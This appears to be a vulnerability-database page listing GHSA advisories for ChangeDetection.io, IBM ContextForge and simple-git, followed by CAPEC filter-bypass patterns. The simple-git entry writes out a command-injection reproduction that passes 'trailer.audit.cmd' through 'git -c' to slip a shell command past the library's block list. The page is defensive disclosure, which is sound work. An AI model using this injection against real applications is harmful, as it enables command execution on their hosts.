  "details": "ChangeDetection.io versions prior to 0.54.7 contain a protection bypass vulnerability in the SafeXPath3Parser implementation that allows attackers to read arbitrary local files by using unblocked XPath 3.0/3.1 functions such as json-doc() and similar file-access primitives. Attackers can exploit the incomplete blocklist of dangerous XPath functions to access sensitive data from the local filesystem.",
  "id": "GHSA-x3f8-2w95-hw4m",
  "modified": "2026-04-01T21:30:30Z",
  "published": "2026-04-01T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35000"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/commit/dadc804567a51f803cd6715f7885c11a247915f6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/changedetection-io-safexpath3parser-bypass-arbitrary-file-read"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-X4XW-XV9J-3C3Q

Vulnerability from github – Published: 2026-09-15 18:32 – Updated: 2026-09-15 18:32
VLAI
Details

IBM ContextForge MCP Gateway <= v1.0.4 IBM mcp-context-forge could allow an authenticated user to bypass protection mechanisms due to incomplete recursive inspection of nested payload content.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-11918"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-09-15T18:17:12Z",
    "severity": "MODERATE"
  },
  "details": "IBM ContextForge MCP Gateway \u003c= v1.0.4 IBM mcp-context-forge could allow an authenticated user to bypass protection mechanisms due to incomplete recursive inspection of nested payload content.",
  "id": "GHSA-x4xw-xv9j-3c3q",
  "modified": "2026-09-15T18:32:34Z",
  "published": "2026-09-15T18:32:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11918"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7285720"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X6JW-M9V5-85VH

Vulnerability from github – Published: 2026-10-05 23:48 – Updated: 2026-10-05 23:48
VLAI
Summary
simple-git unsafe-operation guard does not block trailer command configuration
Details

Affected product

The default blockUnsafeOperationsPlugin in simple-git when an application permits untrusted values to reach SimpleGitOptions.config or Git inline configuration arguments such as -c <key>=<value>.

Summary

trailer.<token>.cmd is not recognized as unsafe by the default guard. Therefore, a configured inline value reaches Git without a GitPluginError.

Git documents trailer.<token>.cmd as a shell command invoked by git interpret-trailers. An application that relies on the default plugin to reject unsafe configuration can therefore execute a command supplied through an untrusted trailer-command configuration value.

Technical details

simple-git/src/lib/git-factory.ts installs commandConfigPrefixingPlugin before blockUnsafeOperationsPlugin. The prefixing plugin in simple-git/src/lib/plugins/command-config-prefixing-plugin.ts turns every SimpleGitOptions.config entry into -c <key>=<value> before the unsafe-operation plugin evaluates the final argv.

In simple-git@3.36.0, blockUnsafeOperationsPlugin delegates to @simple-git/argv-parser. packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts compares parsed configuration writes against preventUnsafeConfig. That list has no matcher for trailer.<token>.cmd, so the invocation is allowed.

Git v2.39.5's Documentation/git-interpret-trailers.txt states that trailer.<token>.cmd specifies a shell command called to generate or modify a trailer.

Preconditions

The application must use an affected simple-git version with the default unsafe-operation plugin active and must pass attacker-controlled data into instance configuration or Git command arguments that configure trailer.<token>.cmd.

The invoked Git binary must support the documented trailer-command behavior, and the application must execute git interpret-trailers with the attacker-controlled configuration in scope. The command runs with the operating-system identity and permissions of the Node.js process.

Verification

Use an isolated test environment and a harmless executable test helper that records only its invocation.

Control: Configure core.editor=<test-helper> through SimpleGitOptions.config and invoke a benign Git task. The default plugin should throw GitPluginError before spawning Git because core.editor is present in preventUnsafeConfig.

Bypass: Configure trailer.audit.cmd=<test-helper> through the same option and invoke Git with the equivalent argv shape:

git -c trailer.audit.cmd=<test-helper> interpret-trailers --trailer audit:<value> <input-file>

A vulnerable build does not raise GitPluginError; Git invokes the test helper while processing the trailer. Confirm the helper invocation, then remove test artifacts.

Impact

An attacker who controls the stated configuration input can cause Git to execute a shell command as the Node.js application process. The impact is bounded by that process's filesystem, network, and service permissions. Applications that do not expose untrusted configuration or command arguments to simple-git are outside this threat model.

Affected versions

Commit 6b3c631eadea81f80ed10f6dec7d19a9db4d7084 introduced the default unsafe-operation plugin, and simple-git@3.15.0 is the first release confirmed to contain it. Its implementation only rejected protocol.allow configuration, leaving trailer-command configuration unblocked.

The latest simple-git release, 3.36.0, still lacks a trailer-command matcher. The current main branch also lacks one. No released remediation was identified.

Remediation

Default-deny configuration keys that can trigger executable behavior, or add a dedicated unsafe category that rejects trailer.<token>.cmd before spawning Git unless the application explicitly opts in.

Evaluate trailer.<token>.command alongside .cmd, because Git documents it as related command behavior. Add parser and integration tests for leading -c, configured instance prefixes, and git config write forms, asserting that no Git child process is spawned without an explicit unsafe opt-in.

Evidence

  • simple-git@3.15.0 was released on 2022-11-12 and contains the initial unsafe-operation plugin.
  • simple-git@3.36.0 was released on 2026-04-12; its parser source does not match trailer.<token>.cmd.
  • main retains the missing matcher in packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts.
  • Git v2.39.5 documents the trailer command behavior in Documentation/git-interpret-trailers.txt.
  • PR #1167 expanded other configuration checks but did not add a trailer-command matcher and is not release-backed as a remediation.
  • This review verified repository, release, and source artifacts through GitHub; it did not independently execute the runtime reproduction.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "simple-git"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.0"
            },
            {
              "fixed": "4.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-102828"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-05T23:48:14Z",
    "nvd_published_at": "2026-09-29T19:17:25Z",
    "severity": "CRITICAL"
  },
  "details": "## Affected product\n\nThe default `blockUnsafeOperationsPlugin` in `simple-git` when an application permits untrusted values to reach `SimpleGitOptions.config` or Git inline configuration arguments such as `-c \u003ckey\u003e=\u003cvalue\u003e`.\n\n## Summary\n\n`trailer.\u003ctoken\u003e.cmd` is not recognized as unsafe by the default guard. Therefore, a configured inline value reaches Git without a `GitPluginError`.\n\nGit documents `trailer.\u003ctoken\u003e.cmd` as a shell command invoked by `git interpret-trailers`. An application that relies on the default plugin to reject unsafe configuration can therefore execute a command supplied through an untrusted trailer-command configuration value.\n\n## Technical details\n\n`simple-git/src/lib/git-factory.ts` installs `commandConfigPrefixingPlugin` before `blockUnsafeOperationsPlugin`. The prefixing plugin in `simple-git/src/lib/plugins/command-config-prefixing-plugin.ts` turns every `SimpleGitOptions.config` entry into `-c \u003ckey\u003e=\u003cvalue\u003e` before the unsafe-operation plugin evaluates the final argv.\n\nIn `simple-git@3.36.0`, `blockUnsafeOperationsPlugin` delegates to `@simple-git/argv-parser`. `packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts` compares parsed configuration writes against `preventUnsafeConfig`. That list has no matcher for `trailer.\u003ctoken\u003e.cmd`, so the invocation is allowed.\n\nGit v2.39.5\u0027s `Documentation/git-interpret-trailers.txt` states that `trailer.\u003ctoken\u003e.cmd` specifies a shell command called to generate or modify a trailer.\n\n## Preconditions\n\nThe application must use an affected `simple-git` version with the default unsafe-operation plugin active and must pass attacker-controlled data into instance configuration or Git command arguments that configure `trailer.\u003ctoken\u003e.cmd`.\n\nThe invoked Git binary must support the documented trailer-command behavior, and the application must execute `git interpret-trailers` with the attacker-controlled configuration in scope. The command runs with the operating-system identity and permissions of the Node.js process.\n\n## Verification\n\nUse an isolated test environment and a harmless executable test helper that records only its invocation.\n\n**Control:** Configure `core.editor=\u003ctest-helper\u003e` through `SimpleGitOptions.config` and invoke a benign Git task. The default plugin should throw `GitPluginError` before spawning Git because `core.editor` is present in `preventUnsafeConfig`.\n\n**Bypass:** Configure `trailer.audit.cmd=\u003ctest-helper\u003e` through the same option and invoke Git with the equivalent argv shape:\n\n`git -c trailer.audit.cmd=\u003ctest-helper\u003e interpret-trailers --trailer audit:\u003cvalue\u003e \u003cinput-file\u003e`\n\nA vulnerable build does not raise `GitPluginError`; Git invokes the test helper while processing the trailer. Confirm the helper invocation, then remove test artifacts.\n\n## Impact\n\nAn attacker who controls the stated configuration input can cause Git to execute a shell command as the Node.js application process. The impact is bounded by that process\u0027s filesystem, network, and service permissions. Applications that do not expose untrusted configuration or command arguments to `simple-git` are outside this threat model.\n\n## Affected versions\n\nCommit `6b3c631eadea81f80ed10f6dec7d19a9db4d7084` introduced the default unsafe-operation plugin, and `simple-git@3.15.0` is the first release confirmed to contain it. Its implementation only rejected `protocol.allow` configuration, leaving trailer-command configuration unblocked.\n\nThe latest `simple-git` release, `3.36.0`, still lacks a trailer-command matcher. The current `main` branch also lacks one. No released remediation was identified.\n\n## Remediation\n\nDefault-deny configuration keys that can trigger executable behavior, or add a dedicated unsafe category that rejects `trailer.\u003ctoken\u003e.cmd` before spawning Git unless the application explicitly opts in.\n\nEvaluate `trailer.\u003ctoken\u003e.command` alongside `.cmd`, because Git documents it as related command behavior. Add parser and integration tests for leading `-c`, configured instance prefixes, and `git config` write forms, asserting that no Git child process is spawned without an explicit unsafe opt-in.\n\n## Evidence\n\n- `simple-git@3.15.0` was released on 2022-11-12 and contains the initial unsafe-operation plugin.\n- `simple-git@3.36.0` was released on 2026-04-12; its parser source does not match `trailer.\u003ctoken\u003e.cmd`.\n- `main` retains the missing matcher in `packages/argv-parser/src/vulnerabilities/detect-vulnerable-config-writes.ts`.\n- Git v2.39.5 documents the trailer command behavior in `Documentation/git-interpret-trailers.txt`.\n- PR #1167 expanded other configuration checks but did not add a trailer-command matcher and is not release-backed as a remediation.\n- This review verified repository, release, and source artifacts through GitHub; it did not independently execute the runtime reproduction.",
  "id": "GHSA-x6jw-m9v5-85vh",
  "modified": "2026-10-05T23:48:14Z",
  "published": "2026-10-05T23:48:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/security/advisories/GHSA-x6jw-m9v5-85vh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-102828"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/pull/1198"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/commit/d762810c13b331ff1e5eb24c0b434646d2a8d1b3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/steveukx/git-js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/releases/tag/simple-git@4.0.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "simple-git unsafe-operation guard does not block trailer command configuration"
}

Mitigation
Implementation

Strategy: Input Validation

Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

CAPEC-120: Double Encoding

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-182: Flash Injection

An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.

CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters

Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-6: Argument Injection

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

CAPEC-71: Using Unicode Encoding to Bypass Validation Logic

An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.